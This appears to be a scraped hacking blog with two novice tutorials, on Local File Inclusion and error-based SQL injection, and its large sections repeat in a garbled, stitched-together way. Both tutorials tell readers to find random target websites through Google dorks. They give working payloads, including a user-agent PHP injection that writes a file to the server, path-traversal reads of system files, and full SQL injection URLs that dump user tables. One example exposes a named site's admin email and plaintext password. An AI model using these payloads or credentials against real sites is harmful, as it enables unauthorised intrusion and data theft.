Error based : https://drive.google.com/open?id=0B9Iw4TQ-C_xCZmItbnpGRVpEaWc
Union based : https://drive.google.com/open?id=0B9Iw4TQ-C_xCQmtta2ZIZkd5MVE
Open source chrome extension made by z3r07y-kn0w
Installation:
Step 1) Extract the rar
Step 2) go to chrome://extensions
Step 3) check developer mode
Step 4) load unpacked extension
Step 5) click options of the chrome extension
Using:
Well i don't also know how to use it but its really easy to learn so good luck!
Friday, April 15, 2016
LFI (Local File Inclusion) 100% noob [BASIC]
!! FOR EDUCATION PURPOSES ONLY !
I Introduction
Hey guys today im gonna teach you LFI (Local File Inclusion).
II Learning Basics
So first we will now learn some basics
1) Google Dorks
what is google dorks?
Google dorks are used for easier searching like "inurl" "intext" like that
why do we need that?
No we dont need that, Just kidding ofcourse we need that to get target websites!
how do we use it?
so for example go to google and search: " inurl:index.php?page=news.php "
you'll see the results like www.website.com/index.php?page=news.php
So what's next?
I Introduction
Hey guys today im gonna teach you LFI (Local File Inclusion).
II Learning Basics
So first we will now learn some basics
1) Google Dorks
what is google dorks?
Google dorks are used for easier searching like "inurl" "intext" like that
why do we need that?
No we dont need that, Just kidding ofcourse we need that to get target websites!
how do we use it?
so for example go to google and search: " inurl:index.php?page=news.php "
you'll see the results like www.website.com/index.php?page=news.php
So what's next?
2) LFI
Local File Inclusion is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application
IV Getting backdoor using LFI
So first, we will try to read /etc/passwd to see if its Directory Traversal
../ is used to go in upper directory / parent directory
www.website.com/index.php?page=/etc/passwd
www.website.com/index.php?page=../etc/passwd
www.website.com/index.php?page=../../etc/passwd
www.website,com/index.php?page=../../../etc/passwd (Worked!)
Next, we will not try to get the /proc/self/environ to execute PHP Scripts
www.website,com/index.php?page=../../../proc/self/environ (Worked!)
To check if it works you should see something like this
,
DOCUMENT_ROOT=/home/www/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5HTTP_CONNECTION=keep-aliveHTTP_HOST=localhostHTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0PATH=/bin:/usr/binPHPRC=/usr/local/lib/QUERY_STRING=page=../../../../proc/self/environREDIRECT_STATUS=200REMOTE_ADDR=182.68.251.152REMOTE_PORT=21007REQUEST_METHOD=GETREQUEST_URI=/?page=../../../../proc/self/environSCRIPT_FILENAME=/home/www/public_html/index.phpSCRIPT_NAME=/index.phpSERVER_ADDR=103.28.12.130SERVER_ADMIN= _NAME=localhostSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=ApacheUNIQUE_ID=U@e2lmccDCgAB3SNHk0AAAA
If you see something like 'HTTP_USER_AGENT=Mozilla' then you're good to go
it could execute php code when requested.
a) If you're using google chrome then its easier because you dont need to download any extensions/add-ons
Step 1) Press f12
Step 2) Click Toggle device mode
Step 3) Click responsive
Step 2) Click Toggle device mode
Step 3) Click responsive
Step 4) Click Edit
Step 5) Add custom device..
Step 6) Add any device name and we will edit the User Agent later
b) If you're using mozilla, download Live HTTP Headers or Tamper Data
So change the User Agent to <?php phpinfo() ?>
Then if you see phpinfo(), change the useragent to:
<?$file = fopen("shhacked.php","w");fwrite($file,"<?phpinfo()?>");fclose($file);phpinfo();?>
And now check www.website.com/shhacked.php
There ya go, Well done.
V Read files using LFI
Ok lets make this quick.
php://filter is a meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. We can read configuration/database.php , only PHP files using it
USAGE : php://filter/convert.base64-encode/resource=file name here
for example: https://icrpv5.org/index.php?page=php://filter/convert.base64-encode/resource=includes/process_login.php
you'll see a base64 encoded. Decode it in http://shunz19.blogspot.com/2016/04/string-tools.html
So if you decode it, you'll see "if ($email == "admin@icrpv5.org" AND $password == '2015icrpvB4L1')" Ez, the email is admin@icrpv5.org and password is 2015icrpvB4L1
VI Tips
If you use /proc/self/environ and it doesnt load
In order to perform a LFI log poisoning you need to be able to include the apache error or and access logs. Unfortuantly have been made "impossible" in newer versions of apache(the most used web server)
Some Common log Files:=>
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log
VII Goodbye
If you have some feedback and question please feel free to comment! thats all for now, bye!
Step 5) Add custom device..
Step 6) Add any device name and we will edit the User Agent later
b) If you're using mozilla, download Live HTTP Headers or Tamper Data
So change the User Agent to <?php phpinfo() ?>
Then if you see phpinfo(), change the useragent to:
<?$file = fopen("shhacked.php","w");fwrite($file,"<?phpinfo()?>");fclose($file);phpinfo();?>
And now check www.website.com/shhacked.php
There ya go, Well done.
V Read files using LFI
Ok lets make this quick.
php://filter is a meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. We can read configuration/database.php , only PHP files using it
USAGE : php://filter/convert.base64-encode/resource=file name here
for example: https://icrpv5.org/index.php?page=php://filter/convert.base64-encode/resource=includes/process_login.php
you'll see a base64 encoded. Decode it in http://shunz19.blogspot.com/2016/04/string-tools.html
So if you decode it, you'll see "if ($email == "admin@icrpv5.org" AND $password == '2015icrpvB4L1')" Ez, the email is admin@icrpv5.org and password is 2015icrpvB4L1
VI Tips
If you use /proc/self/environ and it doesnt load
In order to perform a LFI log poisoning you need to be able to include the apache error or and access logs. Unfortuantly have been made "impossible" in newer versions of apache(the most used web server)
Some Common log Files:=>
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log
VII Goodbye
If you have some feedback and question please feel free to comment! thats all for now, bye!
Error Based SQL Injection 100% Noob! [BASIC]
!! FOR EDUCATION PURPOSES ONLY !!
I introduction
Hey guys.. Today im gonna teach you error based SQL Injection!
What is the difference between Union Based and Error based?
The difference between Union and Error based are
1) union is harder than error based i think
2) Union based is where you will select all the columns and inject in the injectable column. While error based is you'll make an error that will dump the information
3) You dont need to count the vulnerable columns in error based.
II Learning basics
So first we will now learn some basics
1) Google Dorks
what is google dorks?
Google dorks are used for easier searching like "inurl" "intext" like that
why do we need that?
No we dont need that, Just kidding ofcourse we need that to get target websites!
how do we use it?
so for example go to google and search: " inurl:news.php?id= "
you'll see the results like www.website.com/news.php?id=5
So what's next?
2) SQL
Structured Query Language(SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? ofcourse wikipedia
3) SQL Injection
SQL injection is kind of attack that has malicious code inserted into sql statements to drop,update,add,view etc a database
so after learning some basics. We will now proceed to another basic. basic sql injection 100% for noob learner.
III Gathering
So after learning some basics we will now gather some information
Part 1 : Finding target website
To find a target website, we will need to use google dorks
lets google : " inurl:page.php?id= "
You can make your own dork if you want, here is some examples :
inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19
So get some target and lets start.
Part 2 : Checking if vulnerable
After getting a website target, we will now check if its vulnerable to SQL injection or not.
example this is my target : leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
You'll add a colon " ' " to the end of the number
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'
If you see something like this :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
if it doesnt load normally and it shows an error that doesnt look like that, i suggest you checking my article about union based sql injection
If it loads normally, then you should get another target
Part 3 : Getting right comment
So after we learn how to check if its vulnerable to error based, we will now check check the right comment. So try adding " '--+ " after the ID number.
the url now will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'_PAYLOAD_--+
If page loads normally then the id is a string, but if the page loads with error then the id is integer, then the comment is --
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1_PAYLOAD--
In my target, the right comment is '--+
Part 4 : Checking version
So lets verify that its really vulnerable to Error Based by getting version
so simply add +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 to the payload
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+
there we go we got the version
Duplicate entry '5.5.48-cll:1' for key 'group_key'
the version of mysql is 5.5.48-cll
Part 5 : Getting databases
After getting the version,we will now get the database names this is our payload +OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+
And there we go! we got the database name. If you want to check for other databases then use this payload +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
so the link will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'information_schema~1' for key 'group_key'
go to http://shunz19.blogspot.com/2016/04/string-tools.html and hex the database name
Now leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
then add 0x in the start so "0x6c65657474696d655f37363177486f6c65"
Our payload to get the database is +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
So our link will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'testtable1~1' for key 'group_key'
The first table is : testtable1
lets check for the another table by increasing the limit by 1
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'userlogs~1' for key 'group_key'
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'users~1' for key 'group_key'
And keep increasing the limit number to get the tables
Part 7 : Getting columns
So after getting tables and databases, we will now get the columns.
Our payload to get the columns is : +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=_HEXTABLE_+AND+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
so the hex of users is "7573657273"
and leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
add 0x also.
The url will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
I introduction
Hey guys.. Today im gonna teach you error based SQL Injection!
What is the difference between Union Based and Error based?
The difference between Union and Error based are
1) union is harder than error based i think
2) Union based is where you will select all the columns and inject in the injectable column. While error based is you'll make an error that will dump the information
3) You dont need to count the vulnerable columns in error based.
II Learning basics
So first we will now learn some basics
1) Google Dorks
what is google dorks?
Google dorks are used for easier searching like "inurl" "intext" like that
why do we need that?
No we dont need that, Just kidding ofcourse we need that to get target websites!
how do we use it?
so for example go to google and search: " inurl:news.php?id= "
you'll see the results like www.website.com/news.php?id=5
So what's next?
2) SQL
Structured Query Language(SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? ofcourse wikipedia
3) SQL Injection
SQL injection is kind of attack that has malicious code inserted into sql statements to drop,update,add,view etc a database
so after learning some basics. We will now proceed to another basic. basic sql injection 100% for noob learner.
III Gathering
So after learning some basics we will now gather some information
Part 1 : Finding target website
To find a target website, we will need to use google dorks
lets google : " inurl:page.php?id= "
You can make your own dork if you want, here is some examples :
inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19
So get some target and lets start.
Part 2 : Checking if vulnerable
After getting a website target, we will now check if its vulnerable to SQL injection or not.
example this is my target : leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
You'll add a colon " ' " to the end of the number
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'
If you see something like this :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
if it doesnt load normally and it shows an error that doesnt look like that, i suggest you checking my article about union based sql injection
If it loads normally, then you should get another target
Part 3 : Getting right comment
So after we learn how to check if its vulnerable to error based, we will now check check the right comment. So try adding " '--+ " after the ID number.
the url now will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'_PAYLOAD_--+
If page loads normally then the id is a string, but if the page loads with error then the id is integer, then the comment is --
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1_PAYLOAD--
In my target, the right comment is '--+
Part 4 : Checking version
So lets verify that its really vulnerable to Error Based by getting version
so simply add +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 to the payload
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+
there we go we got the version
Duplicate entry '5.5.48-cll:1' for key 'group_key'
the version of mysql is 5.5.48-cll
Part 5 : Getting databases
After getting the version,we will now get the database names this is our payload +OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+OR+1+GROUP+BY+CONCAT_WS(0x3a,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+
And there we go! we got the database name. If you want to check for other databases then use this payload +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
so the link will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'information_schema~1' for key 'group_key'
so the first database is information_schema
now increase the LIMIT in the payload by 1 to check the next database name.
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'leettime_761wHole~1' for key 'group_key'
Second database name is leettime_761wHole . Then lets check the third database
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(schema_name)+AS+CHAR),0x7e))+FROM+information_schema.schemata+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
If the page loads normally, then the third base doesnt exist.
Part 6 : Getting tables
After getting the database names, we will now try to get the tables of that database.
the database name in my target is leettime_761wHole
Now leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
then add 0x in the start so "0x6c65657474696d655f37363177486f6c65"
Our payload to get the database is +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
So our link will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'testtable1~1' for key 'group_key'
The first table is : testtable1
lets check for the another table by increasing the limit by 1
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'userlogs~1' for key 'group_key'
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'users~1' for key 'group_key'
And keep increasing the limit number to get the tables
Part 7 : Getting columns
So after getting tables and databases, we will now get the columns.
Our payload to get the columns is : +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=_HEXTABLE_+AND+table_schema=_HEXDATABASE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
so the hex of users is "7573657273"
and leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65"
add 0x also.
The url will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'id~1' for key 'group_key'
the first column is id, again, increase the limit to get the next column
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'username~1' for key 'group_key'
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x7573657273+AND+table_schema=0x6c65657474696d655f37363177486f6c65+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'password~1' for key 'group_key'
and again and again...
Part 8 : Dumping data
After we got the database, table and columns.. Now its time to dump the data! YAY!
Our payload to get dump the data is +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(_COLUMN_)+AS+CHAR),0x7e))+FROM+_DATABASE_._TABLE_+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
* NOTE: YOU CANNOT GET MULTIPLE COLUMNS. LIKE username,0x3a,password . IT WILL NOT WORK *
So the url will be
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'admin~1' for key 'group_key'
again, increase the limit by 1.
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'decompiler~1' for key 'group_key'
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username)+AS+CHAR),0x7e))+FROM+leettime_761wHole.users+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
Duplicate entry 'devilhunte~1' for key 'group_key'
and increase then increase then increase.
IV Getting login panel
So what's the point of getting the login credentials if you're not gonna use it for login?
Some of passwords are hashed, like md5,SHA1 etc.. You can decrypt those md5 and others in md5online.com , crackstation.net ,
There is so many tools to get the login panel, but the common panels are
www.website.com/admin
www.website.com/administrator
www.website.com/admin.php
www.website.com/administrator.php
www.website.com/login.php
www.website.com/cms
V Goodbye
Thank you for reading this tutorial hope you learn something! If you have some questions or feedback please don't hesitate to comment!
Subscribe to:
Posts (Atom)